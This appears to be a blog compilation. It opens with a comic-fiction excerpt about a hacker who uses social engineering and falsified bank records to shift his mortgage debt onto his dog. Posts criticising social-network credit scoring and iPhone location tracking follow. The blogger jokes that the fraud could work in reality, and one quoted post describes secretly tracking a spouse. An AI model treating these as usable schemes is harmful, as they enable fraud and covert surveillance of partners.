“I will make a note of that right here, Mr. Stone, and we will be sure to consider that when viewing your file. Is there anything else you need help with today, sir?” Jenny asked politely.

“No, I believe I have been served quite well, Jenny. Thank you.” He said.

“Well, would like to take a brief survey to rate my…” Click.

“Nice girl,” David thought to himself as he hung up the phone and scanned in Nicky’s vet document. “Well, that takes care of the mortgage, now I just have to deal with electricity, gas, and credit cards.”

David couldn’t help but feel pleased with himself after this solution. The only thing he liked more than a well implemented exploit was one that tied up a loose end for the foreseeable future. He figured he deserved a break to blow the heads off of some zombies before returning to the tiring yet fulfilling task of escaping work.

As he watched the zombie heads bouncing off his HD monitor in time to the resonating sloppy thuds emitting from his surround sound system he couldn’t help but feel depressed that he hadn’t yet cracked the ultimate shell; His ultimate prize and undying desire. This was of course to game the system so completely and so perfectly that he could have his lifelong goal of unlimited money. Until that day he felt like a rank amateur playing at his profession of slacker.

This nagging feeling had plagued him since childhood. His parents had always been on the overbearing side and watched his every move. While the normal kids experimented with drugs, alcohol and sex, he was left to only watch. Stuck between their rock hard force in his life during the times of their explicit presence and their unshakable expectations when there weren’t by his side.

His youth was one filled with angst and rebellion building in an un-manifestable form. It began when he was fourteen; the world opened to him as he realized a non-physical but equally caustic way to vent his adolescent aggression. A way that was invisible to his ever present parents. It was the life of exploits. He could practice this form of rebellion anywhere at any time without accomplices and without raising a single flag to his parents.

And so, with no conscious knowledge or understanding deeper than raw, raging adolescent emotion piloting his brilliant mind toward anarchistic oblivion, the greatest hacking mind was born into the world. The idea that what he was doing was hacking had never crossed his mind. For hacking, you see, isn’t anything more than a label affixed to a mindset. It wouldn’t be until later that the world would forcibly open David’s eyes to the cause he was part of.

It was this evolution of mentality that brought David to this exact tipping point that would thrust him over the edge into a world of politics and aliens. But I am getting ahead of myself. Back to the precipice, back to the original unending quest for the perfect exploit; the exploit that to David consciously meant unlimited money and power, but subconsciously meant so much more.  It meant the quenching of an unquenchable thirst; the scratching of an invisible ever-present itch; the completion of his greatest work of art.

I mention all of this not to ruin the readers surprise, but in hopes of whetting their appetite. This exact day was the day David succeeded in breaking the system so completely that his dream was realized.

So once again David uses his awesome Social Engineering skills, mixed with fraudulent information hacked into the bank records (recall that Nicky the dog’s “legal” name is David Nicholas Stone) to avoid his mortgage payment. This exploit is particularly interesting in that it’s a variation of identity theft where rather than stealing someone’s identity you give your identity to someone who doesn’t know or doesn’t care – like Nicky, David’s canine roommate – such that they are responsible for your debts. Now, granted this exploit only works this well in Trustonia, but I suspect there are variations that work quite nicely here in reality. To the extent that we live in reality.

The last part is an interesting discourse on the hacker mindset from the thinly veiled pen (er… keyboard) of the creator of Captain X-ploit. Certainly something to think about while you are planning your next exploit (er… adventure).

Another nasty Christmas Present from Facebook

Whenever somebody comes up with a new business idea involving social media it’s usually time to cover your private parts. To the extent that you can. Take this idea from Hong Kong-based microlending startup Lenddo as described in this article in The Observer.

[Lendo] calls itself “the first credit scoring service that uses your online social network to assess credit.” The first thing Lenddo asks for is a Facebook account; then it wants access to Gmail, Twitter, Yahoo, and Windows Live. The Observer was given a respectable score of 470. But when we tried to apply for a loan, we were told “you need at least 3 connections with scores above 400 in your Lenddo trusted network.”

The company’s algorithm is proprietary and secret, said CEO Jeff Stewart, but the primary metric is what Lenddo knows about the people you’re friends with. “We think that in the age of the internet you should be able to establish your reputation and your identity through your social graph, through your on- and offline community, and use that to get access to financial products and information,” he said.

If Lenddo sees one of your best Facebook buddies took out a loan and paid it back, there’s a good chance you will too. “Our backgrounds are in machine learning and pattern recognition,” Mr. Stewart said. “It’s some serious math.

“There’s no reason there shouldn’t be thousands of engineers working to assess creditworthiness.”

I should note here that I too have a background in machine learning and pattern recognition but would hardly summarize it as “some serious math” except maybe to US GOP Presidential nominee hopefuls to whom addition is apparently an arcane art, but I digress…

Marketing hype aside, this simply checks to see if your Facebook “friends” are creditworthy and makes the unwarranted leap that you are like them with respect to creditworthiness. Problem with that idea is when you have “friends” with completely fictional profiles on social media sites. Like say me (when I was on Facebook) or Nitrozac and Snaggy. If you had friended me on Facebook, services like Lendo might conclude (not without basis) that you were a total wackjob. Seriously though, there is a very ugly side to this social credit rating business.

In another nifty but nefarious innovation, Lenddo reserves the right to broadcast your loan status if you fall into default. As the site warns: “Failure to repay will negatively impact your Lenddo score, as well as the score of your Lenddo friends. Lenddo MAINTAINS THE RIGHT TO NOTIFY YOUR FRIENDS, FAMILY AND COMMUNITY if the borrower fails to repay, however, this is only done after several notifications to the borrower and an attempt to work out a payment plan.”

“I think Mark Zuckerberg said it best,” Mr. Stewart said. “Every industry will be in fact impacted by social.”

Banks have been curious about using social media to gauge risk for at least a year, said Matt Thomson, VP of platform at Klout, which calculates “influence” based on a user’s social media activity. Determining creditworthiness is not a core product of Klout’s, he said, but banks have approached the startup to ask about it. He wouldn’t name names. “It’s really like the who’s who of banking,” he said.

(Mr. Stewart of Lenddo also said his startup is approached “regularly” by major banks curious about the algorithm.)

So let me get this straight, the same weasels who trashed the global economy with financial instruments that institutionalized fraudulent and unsecured, except by other equally dodgy financial instruments like credit default swaps, mortgages are now using the fact that everyone knows – or is – someone who was victimized in this debacle to further victimize people?

This time I’m not even going though the pretense of some imaginary conversation about privacy being dead, I’ll just throw out this quote and leave it at that.

Media theorist Douglas Rushkoff dismissed the idea that social media credit scoring is a serious erosion of privacy, mostly because there’s nothing left to hide. “We’re already in the nightmare scenario,” he wrote in an email. “They already know everything about you—more than most of us realize. If anything, the addition of social networking information to this data mining will help us come to some understanding of how much more these companies know about us than we know about ourselves.”

And there you have it folks from the lips (or keyboard) of a bona fide Media theorist – social media credit scoring doesn’t invade your privacy because you have no privacy to invade. So if you are still on Facebook you might as well just bend over. Again. Or quit being a tool. I’m just saying.

Hiding in Glass Houses

You’re building glass houses on the sand
Then you stand around and shake your head
When they all fall down
From Glass Houses by Steel Magnolias

So the big tech and style news this month, in case you missed it, was Apple’s hyperbole laden and new(ish) iPhone 4s and iOS5. This baby boasts everything better, faster and smarter (Siri notwithstanding) than the old school iPhone 4. Including this swell new(ish) app called Find My Friends which is described in Slashgear thusly [emphasis mine].

The free app, which uses GPS to locate your friends and family and, if the privacy settings mash correctly, display them on a map in real-time, can be found here.

But as Aahz the Pervect was wont to say “Therein lies the story”. That deal about privacy settings should be a clue [hint - turn them all off]. There’s even an interesting thread on MacRumors making it’s way around the blogosphere with a tale to make divorce lawyers weep. In agony or ecstasy depending on which side they represent.

I got my wife a new 4s and loaded up find my friends without her knowing. She  told me she was at her friends house in the east village. I’ve had suspicions  about her meeting this guy who live uptown. Lo and behold, Find my Friends has  her right there.

Regardless of the veracity of the post, I posit the following question: Who really thinks it’s a good idea to have everyone know exactly (within 10 meters) where you are at all times? I can think of a number of folks, in addition to suspicious spouses, who love this idea including:

  1. Law Enforcement – rounding up the usual suspects has never been easier
  2. Burglars who prefer victims to be elsewhere than the location being burgled – saves all that unpleasantness associated with being surprised by irate property owners.
  3. Employers who want to verify that employees are actually working from home – or really at the dentist instead of interviewing for another job.

Now certainly there might be situations where this feature would have a non-nefarious or even beneficial usage, like say finding a missing child. I’m just doubtful that would work in a serious situation like say kidnapping. Unless the kidnapper was stupid enough to keep the phone,  like say users of Find My Friends.

You see, here’s the deal – owning a smart phone or other GPS-enabled mobile device is like hiding in a glass house. Unless you take extraordinary measures anyone can find you. At any time.  Problem is most users of the aforementioned devices have no idea how exposed they are by default – not to mention what happens when they use an app like Find My Friends.

About now you may be thinking, “Yeah, well maybe that’s true, but everybody knows that privacy has been dead since 1999 so deal with it”,  channeling Scott McNealy’s infamous comment. Or even “You shouldn’t be worried about privacy unless you have something to hide”.

And that, my friend, is what concerns me. When everyone accepts this truism and becomes willing to trade their privacy – and ultimately their liberty to disagree with whatever authority is currently watching – for slick but useless diversions there will be serious consequences.

We may not be able to do anything about our modern life in glass houses. But at least we can try to hide without constantly screaming our location.